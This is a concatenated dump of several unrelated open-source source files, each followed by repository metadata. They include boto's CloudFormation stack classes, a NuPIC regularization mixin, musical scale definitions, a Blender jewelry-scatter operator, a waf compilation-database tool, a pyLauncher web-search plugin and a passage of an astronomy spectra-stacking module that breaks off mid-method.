field=models.URLField(blank=True, help_text='The prefix for the URI of this section.', max_length=256, verbose_name='URI Prefix'),
),
]
| apache-2.0 | 1,959,474,701,729,166,000 | 49.081081 | 170 | 0.612412 | false | 4.370283 | false | false | false |
canvasnetworks/canvas | common/boto/cloudformation/stack.py | 10 | 9892 | from datetime import datetime
from boto.resultset import ResultSet
class Stack:
def __init__(self, connection=None):
self.connection = connection
self.creation_time = None
self.description = None
self.disable_rollback = None
self.notification_arns = []
self.outputs = []
self.parameters = []
self.stack_id = None
self.stack_status = None
self.stack_name = None
self.stack_name_reason = None
self.timeout_in_minutes = None
def startElement(self, name, attrs, connection):
if name == "Parameters":
self.parameters = ResultSet([('member', Parameter)])
return self.parameters
elif name == "Outputs":
self.outputs = ResultSet([('member', Output)])
return self.outputs
else:
return None
def endElement(self, name, value, connection):
if name == 'CreationTime':
self.creation_time = datetime.strptime(value, '%Y-%m-%dT%H:%M:%SZ')
elif name == "Description":
self.description = value
elif name == "DisableRollback":
self.disable_rollback = bool(value)
elif name == "NotificationARNs":
self.notification_arns = value
elif name == 'StackId':
self.stack_id = value
elif name == 'StackName':
self.stack_name = value
elif name == 'StackStatus':
self.stack_status = value
elif name == "StackStatusReason":
self.stack_status_reason = value
elif name == "TimeoutInMinutes":
self.timeout_in_minutes = int(value)
elif name == "member":
pass
else:
setattr(self, name, value)
def delete(self):
return self.connection.delete_stack(stack_name_or_id=self.stack_id)
def describe_events(self, next_token=None):
return self.connection.describe_stack_events(
stack_name_or_id=self.stack_id,
next_token=next_token
)
def describe_resource(self, logical_resource_id):
return self.connection.describe_stack_resource(
stack_name_or_id=self.stack_id,
logical_resource_id=logical_resource_id
)
def describe_resources(self, logical_resource_id=None,
physical_resource_id=None):
return self.connection.describe_stack_resources(
stack_name_or_id=self.stack_id,
logical_resource_id=logical_resource_id,
physical_resource_id=physical_resource_id
)
def list_resources(self, next_token=None):
return self.connection.list_stack_resources(
stack_name_or_id=self.stack_id,
next_token=next_token
)
def update(self):
rs = self.connection.describe_stacks(self.stack_id)
if len(rs) == 1 and rs[0].stack_id == self.stack_id:
self.__dict__.update(rs[0].__dict__)
else:
raise ValueError("%s is not a valid Stack ID or Name" %
self.stack_id)
def get_template(self):
return self.connection.get_template(stack_name_or_id=self.stack_id)
class StackSummary:
def __init__(self, connection=None):
self.connection = connection
self.stack_id = None
self.stack_status = None
self.stack_name = None
self.creation_time = None
self.deletion_time = None
self.template_description = None
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == 'StackId':
self.stack_id = value
elif name == 'StackStatus':
self.stack_status = value
elif name == 'StackName':
self.stack_name = value
elif name == 'CreationTime':
self.creation_time = datetime.strptime(value, '%Y-%m-%dT%H:%M:%SZ')
elif name == "DeletionTime":
self.deletion_time = datetime.strptime(value, '%Y-%m-%dT%H:%M:%SZ')
elif name == 'TemplateDescription':
self.template_description = value
elif name == "member":
pass
else:
setattr(self, name, value)
class Parameter:
def __init__(self, connection=None):
self.connection = None
self.key = None
self.value = None
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == "ParameterKey":
self.key = value
elif name == "ParameterValue":
self.value = value
else:
setattr(self, name, value)
def __repr__(self):
return "Parameter:\"%s\"=\"%s\"" % (self.key, self.value)
class Output:
def __init__(self, connection=None):
self.connection = connection
self.description = None
self.key = None
self.value = None
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == "Description":
self.description = value
elif name == "OutputKey":
self.key = value
elif name == "OutputValue":
self.value = value
else:
setattr(self, name, value)
def __repr__(self):
return "Output:\"%s\"=\"%s\"" % (self.key, self.value)
class StackResource:
def __init__(self, connection=None):
self.connection = connection
self.description = None
self.logical_resource_id = None
self.physical_resource_id = None
self.resource_status = None
self.resource_status_reason = None
self.resource_type = None
self.stack_id = None
self.stack_name = None
self.timestamp = None
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == "Description":
self.description = value
elif name == "LogicalResourceId":
self.logical_resource_id = value
elif name == "PhysicalResourceId":
self.physical_resource_id = value
elif name == "ResourceStatus":
self.resource_status = value
elif name == "ResourceStatusReason":
self.resource_status_reason = value
elif name == "ResourceType":
self.resource_type = value
elif name == "StackId":
self.stack_id = value
elif name == "StackName":
self.stack_name = value
elif name == "Timestamp":
self.timestamp = datetime.strptime(value, '%Y-%m-%dT%H:%M:%SZ')
else:
setattr(self, name, value)
def __repr__(self):
return "StackResource:%s (%s)" % (self.logical_resource_id,
self.resource_type)
class StackResourceSummary:
def __init__(self, connection=None):
self.connection = connection
self.last_updated_timestamp = None
self.logical_resource_id = None
self.physical_resource_id = None
self.resource_status = None
self.resource_status_reason = None
self.resource_type = None
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == "LastUpdatedTimestamp":
self.last_updated_timestampe = datetime.strptime(value,
'%Y-%m-%dT%H:%M:%SZ')
elif name == "LogicalResourceId":
self.logical_resource_id = value
elif name == "PhysicalResourceId":
self.physical_resource_id = value
elif name == "ResourceStatus":
self.resource_status = value
elif name == "ResourceStatusReason":
self.resource_status_reason = value
elif name == "ResourceType":
self.resource_type = value
else:
setattr(self, name, value)
def __repr__(self):
return "StackResourceSummary:%s (%s)" % (self.logical_resource_id,
self.resource_type)
class StackEvent:
valid_states = ("CREATE_IN_PROGRESS", "CREATE_FAILED", "CREATE_COMPLETE",
"DELETE_IN_PROGRESS", "DELETE_FAILED", "DELETE_COMPLETE")
def __init__(self, connection=None):
self.connection = connection
self.event_id = None
self.logical_resource_id = None
self.physical_resource_id = None
self.resource_properties = None
self.resource_status = None
self.resource_status_reason = None
self.resource_type = None
self.stack_id = None
self.stack_name = None
self.timestamp = None
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == "EventId":
self.event_id = value
elif name == "LogicalResourceId":
self.logical_resource_id = value
elif name == "PhysicalResourceId":
self.physical_resource_id = value
elif name == "ResourceProperties":
self.resource_properties = value
elif name == "ResourceStatus":
self.resource_status = value
elif name == "ResourceStatusReason":
self.resource_status_reason = value
elif name == "ResourceType":
self.resource_type = value
elif name == "StackId":
self.stack_id = value
elif name == "StackName":
self.stack_name = value
elif name == "Timestamp":
self.timestamp = datetime.strptime(value, '%Y-%m-%dT%H:%M:%SZ')
else:
setattr(self, name, value)
def __repr__(self):
return "StackEvent %s %s %s" % (self.resource_type,
self.logical_resource_id, self.resource_status)
| bsd-3-clause | 7,997,148,358,143,673,000 | 33.228374 | 79 | 0.577638 | false | 4.243672 | false | false | false |
mrcslws/nupic.research | nupic/research/frameworks/backprop_structure/experiments/mixins/regularize.py | 3 | 2518 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2019, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
class Regularize(object):
def __init__(self, reg_schedule=None, downscale_reg_with_training_set=False,
**kwargs):
"""
@param reg_schedule (dict)
Mapping from epoch number to the reg_weight to use on that timestep and
afterward.
@param downscale_reg_with_training_set (bool)
If True, multiply the regularization term by (1 / size_of_training_set)
"""
super().__init__(**kwargs)
if downscale_reg_with_training_set:
self.reg_coefficient = 1 / len(self.dataset_manager.get_train_dataset(0))
else:
self.reg_coefficient = 1
if reg_schedule is None:
self.reg_schedule = {}
self.reg_weight = 1.0
else:
self.reg_schedule = reg_schedule
self.reg_weight = reg_schedule[0]
def _regularization(self):
reg = None # Perform accumulation on the device.
for layer in self.network.modules():
if hasattr(layer, "regularization"):
if reg is None:
reg = layer.regularization()
else:
reg += layer.regularization()
if reg is None:
return 0
else:
return (self.reg_weight
* self.reg_coefficient
* reg)
def run_epoch(self, iteration):
if iteration in self.reg_schedule:
self.reg_weight = self.reg_schedule[iteration]
return super().run_epoch(iteration)
| agpl-3.0 | 6,127,967,217,921,844,000 | 36.029412 | 85 | 0.586974 | false | 4.496429 | false | false | false |
pruperting/python-music-gen | midiutil/Scales.py | 4 | 2527 | """
Music Scales
Source: http://en.wikipedia.org/wiki/List_of_musical_scales_and_modes
Copyright (C) 2012 Alfred Farrugia
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
ACOUSTIC_SCALE = [0, 2, 4, 6, 7, 9, 10]
ADONAI_MALAKH = [0, 2, 4, 5, 7, 8, 10]
AEOLIAN_MODE = [0, 2, 3, 5, 7, 8, 10]
ALGERIAN_SCALE = [0, 2, 3, 6, 7, 8, 11]
ALTERED_SCALE = [0, 1, 3, 4, 6, 8, 10]
AUGMENTED_SCALE = [0, 3, 4, 7, 8, 11]
BEBOP_DOMINANT = [0, 2, 4, 5, 7, 9, 10, 11]
BLUES_SCALE = [0, 3, 5, 6, 7, 10]
DORIAN_MODE = [0, 2, 3, 5, 7, 9, 10]
DOUBLE_HARMONIC_SCALE = [0, 1, 4, 5, 7, 8, 11]
ENIGMATIC_SCALE = [0, 1, 4, 6, 8, 10, 11]
FLAMENCO_MODE = [0, 1, 4, 5, 7, 8, 11]
GYPSY_SCALE = [0, 2, 3, 6, 7, 8, 10]
HALF_DIMINISHED_SCALE = [0, 2, 3, 5, 6, 8, 10]
HARMONIC_MAJOR_SCALE = [0, 2, 4, 5, 7, 8, 11]
HARMONIC_MINOR_SCALE = [0, 2, 3, 5, 7, 8, 11]
HIRAJOSHI_SCALE = [0, 4, 6, 7, 11]
HUNGARIAN_GYPSY_SCALE = [0, 2, 3, 6, 7, 8, 11]
INSEN_SCALE = [0, 1, 5, 7, 10]
IONIAN_MODE = [0, 2, 4, 5, 7, 9, 11]
IWATO_SCALE = [0, 1, 5, 6, 11]
LOCRIAN_MODE = [0, 1, 3, 5, 6, 8, 10]
LYDIAN_AUGMENTED_SCALE = [0, 2, 4, 6, 8, 9, 11]
LYDIAN_MODE = [0, 2, 4, 6, 7, 9, 11]
MAJOR_LOCRIAN = [0, 2, 4, 5, 6, 8, 10]
MELODIC_MINOR_SCALE = [0, 2, 3, 5, 7, 9, 11]
MIXOLYDIAN_MODE = [0, 2, 4, 5, 7, 9, 10]
NEAPOLITAN_MAJOR_SCALE = [0, 1, 3, 5, 7, 9, 11]
NEAPOLITAN_MINOR_SCALE = [0, 1, 3, 5, 7, 8, 11]
PERSIAN_SCALE = [0, 1, 4, 5, 6, 8, 11]
PHRYGIAN_MODE = [0, 1, 3, 5, 7, 8, 10]
PROMETHEUS_SCALE = [0, 2, 4, 6, 9, 10]
TRITONE_SCALE = [0, 1, 4, 6, 7, 10]
UKRAINIAN_DORIAN_SCALE = [0, 2, 3, 6, 7, 9, 10]
WHOLE_TONE_SCALE = [0, 2, 4, 6, 8, 10]
MAJOR = [0, 2, 4, 5, 7, 9, 11]
MINOR = [0, 2, 3, 5, 7, 8, 10]
"""
Build a scale given an array s
Example: to build a scale between 0 and 128 using the notes C, D, E
buildScale([0,2,4],0,128)
"""
def buildScale(s, min_note=0, max_note=128):
return [x + (12 * j)
for j in range(12)
for x in s
if x + (12 * j) >= min_note and x + (12 * j) <= max_note]
| gpl-3.0 | -3,992,176,263,368,867,000 | 33.148649 | 69 | 0.607835 | false | 2.226432 | false | false | false |
mrachinskiy/blender-addon-jewelcraft | op_scatter/__init__.py | 1 | 2581 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# JewelCraft jewelry design toolkit for Blender.
# Copyright (C) 2015-2019 Mikhail Rachinskiy
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# ##### END GPL LICENSE BLOCK #####
from bpy.types import Operator
from bpy.props import IntProperty, FloatProperty, BoolProperty
from .scatter_ui import UI
from .scatter_func import Scatter
class OBJECT_OT_jewelcraft_curve_scatter(UI, Scatter, Operator):
bl_label = "JewelCraft Curve Scatter"
bl_description = "Scatter selected object along active curve"
bl_idname = "object.jewelcraft_curve_scatter"
bl_options = {"REGISTER", "UNDO"}
is_scatter = True
number: IntProperty(name="Object Number", default=10, min=1, soft_max=100)
rot_y: FloatProperty(name="Orientation", step=10, unit="ROTATION")
rot_z: FloatProperty(name="Rotation", step=10, unit="ROTATION")
loc_z: FloatProperty(name="Position", unit="LENGTH")
start: FloatProperty(name="Start")
end: FloatProperty(name="End", default=100.0)
use_absolute_offset: BoolProperty(name="Absolute Offset")
spacing: FloatProperty(name="Spacing", default=0.2, unit="LENGTH")
class OBJECT_OT_jewelcraft_curve_redistribute(UI, Scatter, Operator):
bl_label = "JewelCraft Curve Redistribute"
bl_description = "Redistribute selected objects along curve"
bl_idname = "object.jewelcraft_curve_redistribute"
bl_options = {"REGISTER", "UNDO"}
is_scatter = False
rot_y: FloatProperty(name="Orientation", step=10, unit="ROTATION", options={"SKIP_SAVE"})
rot_z: FloatProperty(name="Rotation", step=10, unit="ROTATION", options={"SKIP_SAVE"})
loc_z: FloatProperty(name="Position", unit="LENGTH", options={"SKIP_SAVE"})
start: FloatProperty(name="Start")
end: FloatProperty(name="End", default=100.0)
use_absolute_offset: BoolProperty(name="Absolute Offset", options={"SKIP_SAVE"})
spacing: FloatProperty(name="Spacing", default=0.2, unit="LENGTH")
| mit | -3,390,926,506,677,198,300 | 38.106061 | 93 | 0.717164 | false | 3.54533 | false | false | false |
tobiasjakobi/mpv | waftools/clang_compilation_database.py | 27 | 2379 | #!/usr/bin/env python
# encoding: utf-8
# Christoph Koke, 2013
# Original source: waflib/extras/clang_compilation_database.py from
# waf git 15d14c7bdf2e (New BSD License)
"""
Writes the c and cpp compile commands into build/compile_commands.json
see http://clang.llvm.org/docs/JSONCompilationDatabase.html
Usage:
def configure(conf):
conf.load('compiler_cxx')
...
conf.load('clang_compilation_database')
"""
import sys, os, json, shlex, pipes
from waflib import Logs, TaskGen
from waflib.Tools import c, cxx
if sys.hexversion >= 0x3030000:
quote = shlex.quote
else:
quote = pipes.quote
@TaskGen.feature('*')
@TaskGen.after_method('process_use')
def collect_compilation_db_tasks(self):
"Add a compilation database entry for compiled tasks"
try:
clang_db = self.bld.clang_compilation_database_tasks
except AttributeError:
clang_db = self.bld.clang_compilation_database_tasks = []
self.bld.add_post_fun(write_compilation_database)
for task in getattr(self, 'compiled_tasks', []):
if isinstance(task, (c.c, cxx.cxx)):
clang_db.append(task)
def write_compilation_database(ctx):
"Write the clang compilation database as JSON"
database_file = ctx.bldnode.make_node('compile_commands.json')
Logs.info("Build commands will be stored in %s" % database_file.path_from(ctx.path))
try:
root = json.load(database_file)
except IOError:
root = []
clang_db = dict((x["file"], x) for x in root)
for task in getattr(ctx, 'clang_compilation_database_tasks', []):
try:
cmd = task.last_cmd
except AttributeError:
continue
directory = getattr(task, 'cwd', ctx.variant_dir)
f_node = task.inputs[0]
filename = os.path.relpath(f_node.abspath(), directory)
cmd = " ".join(map(quote, cmd))
entry = {
"directory": directory,
"command": cmd,
"file": filename,
}
clang_db[filename] = entry
root = list(clang_db.values())
database_file.write(json.dumps(root, indent=2))
| gpl-2.0 | -4,243,942,583,667,116,500 | 34.507463 | 92 | 0.575032 | false | 3.958403 | false | false | false |
BGS/pyLauncher | plugins/pyLWeb.py | 1 | 1610 |
# -*- coding: utf-8 -*-
'''
pyLauncher: Windows Application Launcher
Copyright (C) Blaga Florentin Gabriel
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import os
info = {"name" : "pyLWeb",
"author" : "Blaga Florentin Gabriel <https://github.com/BGS/pyLauncher>",
"category": "pylSearchExtensions",
"version": "1.0",
"class" : "execWebSearch"}
class execWebSearch():
def parseQuery(self, query):
query = query.split()
args = query[1:]
if query:
if query[0] == "google":
os.startfile("http://www.google.com/search?source=pyLauncher&q=%s" % " ".join(args))
elif query[0] == "wikipedia":
os.startfile("http://en.wikipedia.org/wiki/Special:Search?search=%s&fulltext=Search" % " ".join(args))
elif query[0] == "youtube":
os.startfile("http://www.youtube.com/results?search_query=%s" % " ".join(args))
else:
pass
| gpl-3.0 | 4,868,357,547,482,469,000 | 29.377358 | 118 | 0.628571 | false | 3.788235 | false | false | false |
JohanComparat/pySU | galaxy/python/ModelSpectraStacks.py | 1 | 22503 | """
.. moduleauthor:: Johan Comparat <johan.comparat__at__gmail.com>
General purpose:
................
The class ModelSpectraStacks is dedicated to modelling and extracting information from stacks of spectra.
*Imports*::
import matplotlib
matplotlib.use('pdf')
import matplotlib.pyplot as p
import os
import astropy.cosmology as co
cosmo=co.FlatLambdaCDM(H0=70,Om0=0.3)
import astropy.units as u
import astropy.io.fits as fits
import numpy as n
from scipy.optimize import curve_fit
from scipy.interpolate import interp1d
from scipy.stats import scoreatpercentile
import astropy.io.fits as fits
from lineListAir import *
import LineFittingLibrary as lineFit
"""
import matplotlib
matplotlib.use('pdf')
import matplotlib.pyplot as p
import os
from os.path import join
import astropy.cosmology as co
cosmo=co.Planck13 #co.FlatLambdaCDM(H0=70,Om0=0.3)
import astropy.units as u
import astropy.io.fits as fits
import numpy as n
from scipy.optimize import curve_fit
from scipy.interpolate import interp1d
from scipy.stats import scoreatpercentile
import astropy.io.fits as fits
from lineListVac import *
allLinesList = n.array([ [Ne3,Ne3_3869,"Ne3_3869","left"], [Ne3,Ne3_3968,"Ne3_3968","left"], [O3,O3_4363,"O3_4363","right"], [O3,O3_4960,"O3_4960","left"], [O3,O3_5007,"O3_5007","right"], [H1,H1_3970,"H1_3970","right"], [H1,H1_4102,"H1_4102","right"], [H1,H1_4341,"H1_4341","right"], [H1,H1_4862,"H1_4862","left"]])
# other lines that are optional
# [N2,N2_6549,"N2_6549","left"], [N2,N2_6585,"N2_6585","right"] , [H1,H1_6564,"H1_6564","left"]
# , [S2,S2_6718,"S2_6718","left"], [S2,S2_6732,"S2_6732","right"], [Ar3,Ar3_7137,"Ar3_7137","left"], [H1,H1_1216,"H1_1216","right"]
doubletList = n.array([[O2_3727,"O2_3727",O2_3729,"O2_3729",O2_mean]])
# import the fitting routines
import LineFittingLibrary as lineFit
#O2a=3727.092
#O2b=3729.875
#O2=(O2a+O2b)/2.
#Hg=4102.892
#Hd=4341.684
#Hb=4862.683
#O3a=4960.295
#O3b=5008.240
#Ha=6564.61
fnu = lambda mAB : 10**(-(mAB+48.6)/2.5) # erg/cm2/s/Hz
flambda= lambda mAB, ll : 10**10 * c*1000 * fnu(mAB) / ll**2. # erg/cm2/s/A
kla=lambda ll :2.659 *(-2.156+1.509/ll-0.198/ll**2+0.011/ll**3 ) + 4.05
klb=lambda ll :2.659 *(-1.857+1.040/ll)+4.05
def kl(ll):
"""Calzetti extinction law"""
if ll>6300:
return klb(ll)
if ll<=6300:
return kla(ll)
class ModelSpectraStacks:
"""
This class fits the emission lines on the continuum-subtracted stack.
:param stack_file: fits file generated with a LF in a luminosity bin.
:param cosmo: cosmology class from astropy
:param firefly_min_wavelength: minimum wavelength considered by firefly (default : 1000)
:param firefly_max_wavelength: minimum wavelength considered by firefly (default : 7500)
:param dV: default value that hold the place (default : -9999.99)
:param N_spectra_limitFraction: If the stack was made with N spectra. N_spectra_limitFraction selects the points that have were computed using more thant N_spectra_limitFraction * N spectra. (default : 0.8)
"""
def __init__(self, stack_file, model_file, mode="MILES", cosmo=cosmo, firefly_min_wavelength= 1000., firefly_max_wavelength=7500., dV=-9999.99, N_spectra_limitFraction=0.8, tutorial = False, eboss_stack = False):
self.stack_file = stack_file
self.stack_file_base = os.path.basename(stack_file)[:-5]
self.lineName = self.stack_file_base[:7]
self.stack_model_file = model_file
self.mode = mode
self.tutorial = tutorial
self.eboss_stack = eboss_stack
# retrieves the firefly model for the stack: stack_model_file
"""
if self.mode=="MILES":
self.stack_model_file = join( os.environ['SPECTRASTACKS_DIR'], "fits", self.lineName, self.stack_file_base + "-SPM-MILES.fits")
if self.mode=="STELIB":
self.stack_model_file = join( os.environ['SPECTRASTACKS_DIR'], "fits", self.lineName, self.stack_file_base + "-SPM-STELIB.fits")
"""
if self.tutorial :
self.stack_model_file = join( os.environ['DATA_DIR'], "ELG-composite", self.stack_file_base + "-SPM-MILES.fits")
if self.mode=="EBOSS": #eboss_stack :
self.stack_model_file = join(os.environ['EBOSS_TARGET'],"elg", "tests", "stacks", "fits", self.stack_file_base[:-6]+ "-SPM-MILES.fits")
self.redshift = 0.85
else :
self.redshift = float(self.stack_file_base.split('-')[2].split('_')[0][1:])
self.cosmo = cosmo
self.firefly_max_wavelength = firefly_max_wavelength
self.firefly_min_wavelength = firefly_min_wavelength
self.dV = dV
self.side = ''
self.N_spectra_limitFraction = N_spectra_limitFraction
# define self.sphereCM, find redshift ...
sphere=4*n.pi*( self.cosmo.luminosity_distance(self.redshift) )**2.
self.sphereCM=sphere.to(u.cm**2)
self.hdus = fits.open(self.stack_file)
self.hdR = self.hdus[0].header
self.hdu1 = self.hdus[1] # .data
print "Loads the data."
#print self.hdu1.data.dtype
if self.tutorial :
wlA, flA, flErrA = self.hdu1.data['WAVE'][0], self.hdu1.data['FLUXMEDIAN'][0]*10**(-17), self.hdu1.data['FLUXMEDIAN_ERR'][0]*10**(-17)
self.selection = (flA>0)
self.wl,self.fl,self.flErr = wlA[self.selection], flA[self.selection], flErrA[self.selection]
self.stack=interp1d(self.wl,self.fl)
self.stackErr=interp1d(self.wl,self.flErr)
# loads model :
hdus = fits.open(self.stack_model_file)
self.hdu2 = hdus[1] # .data
self.wlModel,self.flModel = self.hdu2.data['wavelength'], self.hdu2.data['firefly_model']*10**(-17)
self.model=interp1d(n.hstack((self.wlModel,[n.max(self.wlModel)+10,11000])), n.hstack(( self.flModel, [n.median(self.flModel[:-20]),n.median(self.flModel[:-20])] )) )
# wavelength range common to the stack and the model :
self.wlLineSpectrum = n.arange(n.max([self.stack.x.min(),self.model.x.min()]), n.min([self.stack.x.max(),self.model.x.max()]), 0.5)[2:-1]
self.flLineSpectrum=n.array([self.stack(xx)-self.model(xx) for xx in self.wlLineSpectrum])
self.fl_frac_LineSpectrum=n.array([self.stack(xx)/self.model(xx) for xx in self.wlLineSpectrum])
self.flErrLineSpectrum=self.stackErr(self.wlLineSpectrum)
elif eboss_stack :
print self.hdu1.data.dtype
wlA,flA,flErrA = self.hdu1.data['wavelength'], self.hdu1.data['meanWeightedStack']*10**(-17), self.hdu1.data['jackknifStackErrors'] * 10**(-17)
self.selection = (flA>0)
self.wl,self.fl,self.flErr = wlA[self.selection], flA[self.selection], flErrA[self.selection]
self.stack=interp1d(self.wl,self.fl)
self.stackErr=interp1d(self.wl,self.flErr)
# loads model :
hdus = fits.open(self.stack_model_file)
self.hdu2 = hdus[1] # .data
self.wlModel,self.flModel = self.hdu2.data['wavelength'], self.hdu2.data['firefly_model']*10**(-17)
self.model=interp1d(n.hstack((self.wlModel,[n.max(self.wlModel)+10,11000])), n.hstack(( self.flModel, [n.median(self.flModel[:-20]),n.median(self.flModel[:-20])] )) )
# wavelength range common to the stack and the model :
self.wlLineSpectrum = n.arange(n.max([self.stack.x.min(),self.model.x.min()]), n.min([self.stack.x.max(),self.model.x.max()]), 0.5)[2:-1]
self.flLineSpectrum=n.array([self.stack(xx)-self.model(xx) for xx in self.wlLineSpectrum])
self.fl_frac_LineSpectrum=n.array([self.stack(xx)/self.model(xx) for xx in self.wlLineSpectrum])
self.flErrLineSpectrum=self.stackErr(self.wlLineSpectrum)
else:
wlA,flA,flErrA = self.hdu1.data['wavelength'], self.hdu1.data['meanWeightedStack'], self.hdu1.data['jackknifStackErrors']
self.selection = (flA>0) & (self.hdu1.data['NspectraPerPixel'] > float( self.stack_file.split('_')[-5]) * self.N_spectra_limitFraction )
self.wl,self.fl,self.flErr = wlA[self.selection], flA[self.selection], flErrA[self.selection]
self.stack=interp1d(self.wl,self.fl)
self.stackErr=interp1d(self.wl,self.flErr)
# loads model :
hdus = fits.open(self.stack_model_file)
self.hdu2 = hdus[1] # .data
self.wlModel,self.flModel = self.hdu2.data['wavelength'], self.hdu2.data['firefly_model']*10**(-17)
self.model=interp1d(n.hstack((self.wlModel,[n.max(self.wlModel)+10,11000])), n.hstack(( self.flModel, [n.median(self.flModel[:-20]),n.median(self.flModel[:-20])] )) )
# wavelength range common to the stack and the model :
self.wlLineSpectrum = n.arange(n.max([self.stack.x.min(),self.model.x.min()]), n.min([self.stack.x.max(),self.model.x.max()]), 0.5)[2:-1]
self.flLineSpectrum=n.array([self.stack(xx)-self.model(xx) for xx in self.wlLineSpectrum])
self.fl_frac_LineSpectrum=n.array([self.stack(xx)/self.model(xx) for xx in self.wlLineSpectrum])
self.flErrLineSpectrum=self.stackErr(self.wlLineSpectrum)
def interpolate_stack(self):
"""
Divides the measured stack in overlapping and non-overlapping parts with the model.
"""
self.stack=interp1d(self.wl,self.fl)
self.stackErr=interp1d(self.wl,self.flErr)
# bluer than model
self.stBlue = (self.wl<=self.firefly_min_wavelength)
# optical
self.stOpt = (self.wl<self.firefly_max_wavelength)& (self.wl> self.firefly_min_wavelength)
# redder than model
self.stRed = (self.wl>=self.firefly_max_wavelength)
if len(self.wl)<50 :
print "no data, skips spectrum"
return 0.
if len(self.wl[self.stBlue])>0:
self.contBlue=n.median(self.fl[self.stBlue])
self.side='blue'
if len(self.wl[self.stRed])>0:
self.contRed=n.median(self.fl[self.stRed])
self.side='red'
if len(self.wl[self.stRed])>0 and len(self.wl[self.stBlue])>0:
self.contRed=n.median(self.fl[self.stRed])
self.contBlue=n.median(self.fl[self.stBlue])
self.side='both'
if len(self.wl[self.stRed])==0 and len(self.wl[self.stBlue])==0:
self.side='none'
def interpolate_model(self):
"""
Interpolates the model to an array with the same coverage as the stack.
"""
# overlap region with stack
print "interpolate model"
self.mdOK =(self.wlModel>n.min(self.wl))&(self.wlModel<n.max(self.wl))
mdBlue=(self.wlModel<=n.min(self.wl)) # bluer part than data
mdRed=(self.wlModel>=n.max(self.wl)) # redder part than data
okRed=(self.wlModel>4650)&(self.wlModel<self.firefly_max_wavelength)
# Correction model => stack
CORRection=n.sum((self.wl[self.stOpt][1:]-self.wl[self.stOpt][:-1])* self.fl[self.stOpt][1:]) / n.sum((self.wlModel[ self.mdOK ][1:]-self.wlModel[ self.mdOK ][:-1])* self.flModel [ self.mdOK ][1:])
print "Correction", CORRection
if self.side=='red':
self.model=interp1d(n.hstack((self.wlModel[ self.mdOK ],n.arange(self.wlModel[ self.mdOK ].max()+0.5, stack.x.max(), 0.5))), n.hstack(( self.flModel [ self.mdOK ]*CORRection, n.ones_like(n.arange( self.wlModel[ self.mdOK ].max() + 0.5, stack.x.max(), 0.5))*contRed )) )
elif self.side=='blue':
self.model=interp1d(n.hstack((n.arange(stack.x.min(),self.wlModel[ self.mdOK ].min()-1., 0.5),self.wlModel[ self.mdOK ])),n.hstack(( n.ones_like(n.arange(stack.x.min() ,self.wlModel[ self.mdOK ].min() -1.,0.5))* contBlue, self.flModel [ self.mdOK ]*CORRection )) )
elif self.side=='both':
x1=n.hstack((n.arange(stack.x.min(),self.wlModel[ self.mdOK ].min()-1., 0.5), self.wlModel[ self.mdOK ]))
y1=n.hstack(( n.ones_like(n.arange(stack.x.min(),self.wlModel[ self.mdOK ].min()- 1.,0.5))*contBlue, self.flModel [ self.mdOK ]*CORRection ))
x2=n.hstack((x1,n.arange(self.wlModel[ self.mdOK ].max()+0.5,stack.x.max(),0.5)))
y2=n.hstack((y1,n.ones_like(n.arange(self.wlModel[ self.mdOK ].max()+0.5, stack.x.max(), 0.5))*contRed ))
self.model=interp1d(x2,y2)
elif self.side=='none':
self.model=interp1d(self.wlModel[ self.mdOK ], self.flModel [ self.mdOK ])
def subtract_continuum_model(self):
"""
Creates the continuum substracted spectrum: the 'line' spectrum.
"""
self.interpolate_stack()
self.interpolate_model()
# wavelength range common to the stack and the model :
self.wlLineSpectrum = n.arange(n.max([self.stack.x.min(),self.model.x.min()]), n.min([self.stack.x.max(),self.model.x.max()]), 0.5)[2:-1]
print "range probed", self.wlLineSpectrum[0], self.wlLineSpectrum[-1], len( self.wlLineSpectrum)
self.flLineSpectrum=n.array([self.stack(xx)-self.model(xx) for xx in self.wlLineSpectrum])
self.flErrLineSpectrum=self.stackErr(self.wlLineSpectrum)
def fit_lines_to_lineSpectrum(self):
"""
Fits the emission lines on the line spectrum.
"""
# interpolates the mean spectra.
print "fits to the line spectrum"
lfit = lineFit.LineFittingLibrary()
#self.subtract_continuum_model()
data,h=[],[]
print O2_3727
